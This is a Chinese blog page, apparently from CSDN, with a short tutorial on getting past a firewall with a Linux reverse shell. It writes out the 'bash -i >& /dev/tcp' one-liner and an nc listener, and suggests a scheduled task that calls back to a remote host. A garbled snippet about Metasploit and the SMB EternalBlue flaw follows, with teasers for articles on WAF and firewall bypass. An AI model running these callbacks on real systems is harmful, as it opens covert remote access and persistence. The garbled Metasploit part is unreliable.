渗透测试中绕过防火墙限制

业务安全 绕过blacklist IP 黑名单限制 我们在渗透测试的时候,会遇到IP被禁止访问的情况,或者在爆破的时候被限制,IP被加入了黑名单。我们除了使用代理池,还可以尝试下面的办法。 阅读详情

一、前言

运维人员经常在服务维护过程中遇到一个问题就是,有防火墙从外面没法登录服务器,正常登录需要挂vpn,比较麻烦。那么有没有一种方法可以穿透防火墙呢,答案是有的,简单点就是使用linux下反弹shell来做。反向连接运维机器就行了。

二、linux系统下反弹shell原理

通常防火墙是不允许外网ip连接内网服务器,但是内网的服务器可以上网可以向外面获取信息。那么我们就可以使用内部服务主动连接在外网的维护主机就可以穿透防火墙了。

原理,是不是很简单,既然你不能连接我,那么我主动连接你吧。这就是穿透防火墙的根源。

三、怎么实现反弹shell呢?

linux反弹shell非常简单,使用下面命令就可以实现。

bash -i >& /dev/tcp/目标IP/端口 0>&1

下面在测试环境下测试

服务器主机192.168.3.163

运维主机:192.168.3.121

首先我们在运维主机上进行一个端口监听,这里使用nc工具实现

nc -lnvp 6666

执行后下图所示

在服务器主机192.168.3.163 执行反弹shell

bash -i >& /dev/tcp/192.168.3.121/6666 0>&1

我们在运维主机就可以看到反弹连接了,如下图

四、如何应用实际场景

有人就问了,你这不得先去服务器执行反弹shell命令吗?是的没错,我们可以利用计划任务在我们工作时间内自动反弹连接我们运维主机不就解决了每次登录都需要vpn设置了吗!

这样我们固定时间内提前监听端口,工作时间等自动连接后,就可以开始维护服务器,不需要设置繁琐的vpn了。

metasploit学习 杀毒软件和防火墙直接就给删掉了,我们只好很固执的告诉勤奋的防火前:我相信它,他不是病毒!攻击还是要考虑目标机的实际情况。我测试了我的虚拟机win10,而后测试了全家的手机,都没攻进去,大概是10版本太高。该漏洞是微软445端口的问题,SMB,被微软命名为2017的第十号漏洞。默认为HOME / [随机乱码名字] .wav。window:操作系统的版本,macos,linux等。-p :自动播放捕获的音频,默认为“true”-d :记录的秒数,默认为1秒。Set 必选项:RHOSTS。没有视频,可以录音哦。 阅读详情

相关推荐

Gemini Enterprise免费试用攻略:解锁企业级AI平台的隐藏技巧与避坑指南

本文详细介绍了Gemini Enterprise免费试用的全流程攻略,包括注册优化、团队协作、资源管理和典型应用场景。通过解锁企业级AI平台的核心功能如Gemini 3.0 Pro模型和Nano Banana图像生成系统,帮助企业高效评估AI与业务的契合度。文章还提供了安全合规与数据管理的实用建议,确保试用过程顺畅无忧。

weixin_29233857的博客 627

【网络安全】盘点八种攻击者常用的防火墙绕过方法

防火墙是网络安全体系中的重要组成部分,通过过滤网络流量和监控网络连接来提供一定程度的安全保护,并帮助组织识别和拦截恶意流量以及阻止未经授权的访问。目前情况表明,防火墙并非“万能”解决方案,也不能提供绝对的安全保障,需要与其它防御技术手段组合在一起,才能构建起有效的网络安全防御体系。防火墙只能根据预设的规则进行过滤和检测,简单的规则配置可能无法完全捕获复杂的攻击方式,网络攻击技术通过不断创新和演进,可能利用未知的漏洞或隐蔽的攻击方式来规避防火墙的保护。

2301_77472496的博客 3299

AquaCrop-OSPy学习笔记02:模型输入设置

AquaCrop-OSPy的输入设置

EWBA_GIS_RS_ER的博客 3578

web渗透测试----31、检测到绕过web应用防火墙

WAF(web应用防火墙)是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。 文章目录一、WAF的工作原理二、WAF的常见功能三、WAF种类四、WAF的判断五、WAF的绕过六、WAF指纹七、部分WAF指纹 一、WAF的工作原理 WAF工作在web服务器之前,对基于HTTP/HTTPS协议的通信进行检测和识别。在用户请求到达web服务器前对用户请求进行扫描和过滤,分析并校验每个用户请求的网络包,确保每个用户的请求安全且有效,对无效或有攻击行为的请求进行阻断或隔离。

七天 5934

超详细frp配置实现绕过防火墙内网渗透

frp原理 想知道frp原理我们可以先来看一下下面的一张图 可以看到公司电脑在一个局域网,家里电脑在一个局域网内,家里的电脑我们可以认为是在内网当中,我们一般是访问不到内网的主机的。但是处于内网或者是防火墙后面的机器,对外网提供tcp和udp服务, 准备工作(以我自己复现成功举例) 需要一个公网服务器(我是自己买的阿里云) 需要一个内网机器(这里我用的是我物理机安装的虚拟机linux系统,桥接模式的) frp下载地址https://github.com/fatedier/frp/releases

dreamthe的博客 1万+

渗透防火墙绕过

隔两三秒),还可以通过修改请求包的user-agent为百度,360等搜索引擎的信息,从而伪造成搜索引擎在爬取网页,从而不会造成拦。Ⅰ.当利用工具进行扫描时,比如扫描路径,对方开启了wafCC流量检测,则返回的结果会产生误报,可以通过延时扫描来绕过(每次扫描间。还可以利用Xray和awvs,bp联合起来,bp当中转,xray当主要扫描工具,awvs当绕过方式(降低速度,请求头爬虫引擎)②自写轮子:自己抓菜刀蚁剑的读取文件,执行命令的数据包,进行解密,然后自己进行修改,达到目的,进行在网页上的操作,

weixin_46626737的博客 1266

Kali社会工程学攻击--powershell 攻击(无视防火墙)

1、打开setoolkit 输入我们反弹shell的地址与端口 2、修改我的shellcode 3、攻击成功 转载于:https://www.cnblogs.com/BloodZero/p/4463756.html

aipei5098的博客 1953

WAF绕过大全

WAF绕过大全

yggcwhat 2207

Nmap抓包分析与绕过Windows防火墙扫内网存活主机

在打靶场的过程中使用Nmap时发现点小问题,借此机会详细分析下情况,于是有了这篇文章。本文包含以下内容:1. Nmap抓包分析2. 内网下绕过Windows防火墙扫描存活主机这里主要是针对Nmap进行讨论,实战中当然哪个快用哪个。不过万变不离其宗,哪怕稍微了解下其原理都受益无穷。总结一下:arp/a即可。2. WINRM至于如何绕防火墙进行端口扫描,留到以后再说吧。

Palpitate_LL的博客 788

网络攻防:绕过防火墙与入侵检测系统

本章节主要探讨了网络攻防中的高级技巧,包括如何绕过网络访问控制、使用MAC地址欺骗进行责任归属以及利用源路由技术规避防火墙规则。作者通过Nmap工具的使用示例,展示了如何在现实世界中应用这些技术,以及它们可能面临的挑战和应对策略。章节最后通过一个真实案例,说明了如何在实际渗透测试中运用这些技巧来获取网络的访问权。

weixin_31860973的博客 322

Day05:反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载

小迪安全-Day05:反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载

qq_61553520的博客 1265

绕过防火墙连接mysql_mysql利用双重url编码绕过防火墙

http://m.blog.csdn.net/article/details?id=49187783例子:http://www.gzidc.org/search/post 的数据:keyword=a如果单纯的在搜索框中输入:select , union,detele,' 那么就会被waf阻拦页面会显示:非法字符如果用双重编码的url替换注入语句那么,waf就不会拦截下面我写了一个程序来讲普通的注入...

weixin_42525798的博客 206

渗透测试之SSRF漏洞原理危害、产生的原因、探测手法、防御手法、绕过手法、限制的手段

SSRF(服务器端请求伪造)是一种利用服务端发起恶意请求的安全漏洞,攻击者通过构造特定请求访问内网系统。其危害包括内网探测、端口扫描、攻击内网应用等。常见漏洞位置包括分享功能、收藏功能等URL参数未过滤的场景。PHP中易出现漏洞的函数有file_get_contents、fsockopen和curl_exec等。防御措施包括过滤返回信息、限制请求端口、设置防火墙策略等。攻击者可能通过自动化工具探测漏洞,并利用伪协议(如http、file、gopher等)进行绕过

白帽阿叁的博客 674

2、内网安全-域防火墙-入站出站规则-不出网隧道上线-组策略对象同步

用途:个人在线笔记,有所借鉴,欢迎指正隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)

Karka_的博客 3137

kali渗透测试——Nmap扫描补充(绕过防火墙

一些防火墙规则基于端口过滤,可以尝试使用特定的源端口来绕过。使用SYN扫描(也称半开扫描)来减少防火墙检测到的可能性。-T有多个级别,从-T0(最慢)到-T5(最快),选择较低级别可以增加扫描的隐蔽性。通过将数据包分割成更小的部分发送,使得防火墙更难识别这些数据包属于一个扫描流量。方法:nmap --source-port 80 <目标IP地址>-sT 为TCP连接扫描,可能绕过一些只过滤SYN包的防火墙。通过使用多个伪装IP地址,使得防火墙难以确定真实的扫描源。方法:nmap -sS <目标IP地址>

2302_80189643的博客 3372

【网络安全】盘点八种攻击者常用的防火墙绕过方法_渗透测试怎么绕过防火墙

盘点八种攻击者常用的防火墙绕过方法

2301_77472496的博客 1075

第四章 抛弃我,我会战斗不息~跳过防火墙,进入后台

** 目录 第一章 黑客学习路线梳理 第二章 让你的kali变得更好用 第三章 别惹程序员0.0~简单的web渗透拿到用户名密码 ** 继上一篇文章 ([第三章 别惹程序员0.0~简单的web渗透拿到用户名密码),我们已经拿到了美人所创建网站的用户名密码,想着进一步攻击找到后台,却发现这个用户名密码权限很小,根本进入不到网站后台管理,但想想被抛弃的不爽,最终通过不断的信息搜索和探查,找到了一个旁站,或许会是一个新的突入点… 旁站链接: http://kypt8004.ia.aqlab.cn/ 一、信息探

Q893448322的博客 4019

渗透测试基础 - bypass-绕过阻挡我们的WAF(上)

渗透测试基础 - bypass-绕过阻挡我们的WAF(上)简介(bypass 与 waf)网站环境准备常用绕过方法漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 【请进行合法的渗透测试,有关内容只是用作个人复习。】 简介(bypass 与 waf) bypass 根据Google翻译的解释来看,是绕过的意思,且绕过是一个动作,那既然是动作,就会根据不同的障碍物的阻拦做出不同的绕过行为,这对应到我们今天的学习中也是如此。 WA

weixin_45488495的博客 4226

libmp4v2-录制h265 格式视频-mp4录像-c语言

libmp4v2-录制h265 格式视频-mp4录像-c语言,在arm平台上测试实现,容易移植

上一篇: 如何远程执行脚本不留痕迹
下一篇: 别在K8S集群部署上内耗!
luck_me5
博客等级 码龄13年 283粉丝 34原创
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值